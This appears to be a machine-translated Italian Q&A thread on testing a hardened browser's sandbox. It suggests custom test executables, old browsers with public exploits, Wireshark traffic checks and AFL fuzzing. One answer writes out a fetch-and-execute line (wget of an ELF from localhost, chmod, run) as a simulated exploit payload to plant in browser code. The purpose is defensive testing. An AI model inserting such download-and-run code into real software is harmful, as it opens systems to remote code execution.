Come testare la sicurezza di un browser Web consolidato?

Se vuoi testare le funzionalità sandbox hai bisogno di qualcosa come un vero exploit che proverà a fare qualcosa che un utente malintenzionato potrebbe fare. Ma penso che non sia davvero possibile per te ottenere un exploit per un browser corrente. Quindi hai le seguenti opzioni:

1. Testare la sandbox con un eseguibile personalizzato creando un eseguibile che usi le tecniche sandbox e proverà ad eseguire un payload. I risultati potrebbero essere comparabili se il tuo browser non utilizza tecniche sandbox da solo.
2. Prova la tua sandbox con una versione precedente del browser e un exploit pubblico disponibile.
3. Simula un tentativo di exploit introducendo un codice personalizzato nel tuo browser come system("wget http://127.0.0.1/t.elf; chmod +x ./elf; ./elf"); Se il tuo browser è open source potresti ad esempio creare una versione personalizzata del tuo browser e aggiungere il codice personalizzato in una regione di codice dove anche una vera vulnerabilità essere.

Dipende dal tipo di test che stai cercando di fare. Se l'indurimento che hai fatto è stato progettato per impedire al browser di divulgare informazioni in modo inopportuno, potresti impostare qualcosa come Wireshark sulla macchina su cui stai lavorando per controllare il traffico inviato dal browser.

Se stai cercando di verificare se il browser può essere arrestato in modo sfruttabile, allora è diverso. sarebbe una specie di processo complesso ma qualcosa come American Fuzz Lop potrebbe essere un punto di partenza.